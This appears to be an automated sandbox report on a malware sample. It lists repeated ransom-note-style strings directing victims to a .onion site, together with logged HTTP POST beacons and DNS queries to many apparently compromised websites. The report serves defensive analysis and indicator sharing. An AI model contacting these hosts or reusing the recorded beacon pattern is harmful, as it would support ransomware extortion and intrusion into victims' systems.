            Source: myfile.exe, 00000000.00000003.2008810311.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.1647825574.0000000002C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
            Source: myfile.exe, 00000000.00000003.1890024433.0000000002C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.2025165555.0000000002C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.1647839842.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
            Source: myfile.exe, 00000000.00000003.1890097726.0000000002C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.1889990480.0000000002C52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
            Source: myfile.exe, 00000000.00000002.2894500583.0000000002C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: myfile.exe, 00000000.00000003.1890052478.0000000002C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt37.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt16.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt29.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt4.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt56.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt23.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt61.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt45.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt62.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt32.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt41.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt27.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt31.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt22.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt21.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt54.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt50.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt15.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt9.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt0.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt28.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt25.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt60.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt3.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt39.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt38.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt2.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt44.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt52.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt20.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt26.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt36.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt5.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt34.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt18.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt51.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt33.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt35.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt19.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt55.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt1.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt42.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt43.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt57.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt11.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt7.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt24.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt8.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt30.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt47.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt46.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt58.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt40.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt13.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt48.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt6.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt53.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt10.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt14.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt49.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt59.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt17.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: g165067x37-readme.txt12.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1A63B2FBDC010061
            Source: unknownHTTP traffic detected: POST /wp-content/assets/iybw.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: rsidesigns.com
            Source: unknownDNS traffic detected: query: bd2fly.com replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: wribrazil.com replaycode: Server failure (2)
            Source: unknownDNS traffic detected: query: 90nguyentuan.com replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: satoblog.org replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: funworx.de replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: activeterroristwarningcompany.com replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: ikadomus.com replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: enactusnhlstenden.com replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: baikalflot.ru replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: chomiksy.net replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: davedavisphotos.com replaycode: Server failure (2)
            Source: unknownDNS traffic detected: query: avisioninthedesert.com replaycode: Name error (3)
            Source: unknownNetwork traffic detected: DNS query count 54
            Source: unknownNetwork traffic detected: IP country count 11
            Source: Joe Sandbox ViewIP Address: 192.0.78.13 192.0.78.13
            Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
            Source: Joe Sandbox ViewIP Address: 198.185.159.145 198.185.159.145
            Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
            Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
            Source: Joe Sandbox ViewASN Name: INETWIRE-ASWilhelm-Wagenfeld-Str16DE INETWIRE-ASWilhelm-Wagenfeld-Str16DE
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /admin/temp/eghuey.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: parksideseniorliving.net
            Source: global trafficHTTP traffic detected: POST /admin/images/ff.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: lashandbrowenvy.com
            Source: global trafficHTTP traffic detected: POST /wp-content/assets/iybw.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: rsidesigns.com
            Source: global trafficHTTP traffic detected: POST /wp-content/assets/umjrglicgx.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: pansionatblago.ru
            Source: global trafficHTTP traffic detected: POST /static/temp/mdjsvnauuvkc.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: magrinya.net
            Source: global trafficHTTP traffic detected: POST /news/graphic/yooacevq.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: business-basic.de
            Source: global trafficHTTP traffic detected: POST /uploads/assets/xwncifkynx.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: afbudsrejserallinclusive.dk
            Source: global trafficHTTP traffic detected: POST /news/pics/sovuwxryinfm.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: m2graph.fr
            Source: global trafficHTTP traffic detected: POST /content/images/gv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: stanleyqualitysystems.com
            Source: global trafficHTTP traffic detected: GET /content/images/gv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: karnesstanleyhvac.com
            Source: global trafficHTTP traffic detected: POST /content/temp/pg.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: altitudeboise.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: altitudetrampolinepark.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.altitudetrampolinepark.com
            Source: global trafficHTTP traffic detected: POST /static/tmp/vd.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: lexced.com
            Source: global trafficHTTP traffic detected: GET /static/tmp/vd.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.lexced.com
            Source: global trafficHTTP traffic detected: POST /data/graphic/tcafyhpt.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: chainofhopeeurope.eu
            Source: global trafficHTTP traffic detected: POST /data/game/mfkyhvlfokmitv.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: bayshoreelite.com
            Source: global trafficHTTP traffic detected: POST /admin/graphic/qhok.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: mursall.de
            Source: global trafficHTTP traffic detected: POST /include/tmp/vzac.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: testitjavertailut.net
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: princebet88.site
            Source: global trafficHTTP traffic detected: POST /admin/graphic/tajahxayexuseayc.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: vitoriaecoturismo.com.br
            Source: global trafficHTTP traffic detected: POST /admin/game/gatm.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: georgemuncey.com
            Source: global trafficHTTP traffic detected: GET /admin/game/gatm.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.georgemuncey.com
            Source: global trafficHTTP traffic detected: POST /static/pictures/qbadcqiwyz.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: nbva.co.uk
            Source: global trafficHTTP traffic detected: POST /content/pictures/efwjwa.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: c-sprop.com
            Source: global trafficHTTP traffic detected: POST /data/assets/vdtrmjnm.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: relevantonline.eu
            Source: global trafficHTTP traffic detected: POST /news/temp/md.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: abulanov.com
            Source: global trafficHTTP traffic detected: POST /wp-content/graphic/wrza.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: maxcube24.com.ua
            Source: global trafficHTTP traffic detected: POST /uploads/pictures/gcgicdxmun.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: kenmccallum.com
            Source: global trafficHTTP traffic detected: POST /news/pictures/numjznnuau.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: stage-infirmier.fr
            Source: global trafficHTTP traffic detected: POST /wp-content/game/doiathwnvkwf.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: mieleshopping.it
            Source: global trafficHTTP traffic detected: GET /wp-content/game/doiathwnvkwf.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.mieleshopping.it
            Source: global trafficHTTP traffic detected: POST /data/assets/hxdtlt.gif HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: holocine.de
            Source: global trafficHTTP traffic detected: POST /wp-content/pictures/vuvqcuzorejq.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: oscommunity.de
            Source: global trafficHTTP traffic detected: POST /wp-content/temp/wkeqlpss.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: bundan.com
            Source: global trafficHTTP traffic detected: POST /news/temp/wpuatzictpgv.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: hostaletdelsindians.es
            Source: global trafficHTTP traffic detected: GET /news/temp/wpuatzictpgv.jpg HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.hostaletdelsindians.es
            Source: global trafficHTTP traffic detected: POST /content/assets/jlbaveucagau.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Content-Length: 876Host: almamidwifery.com
            Source: global trafficHTTP traffic detected: GET /content/assets/jlbaveucagau.png HTTP/1.1Cache-Control: no-cacheConnection: closePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: www.almamidwifery.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
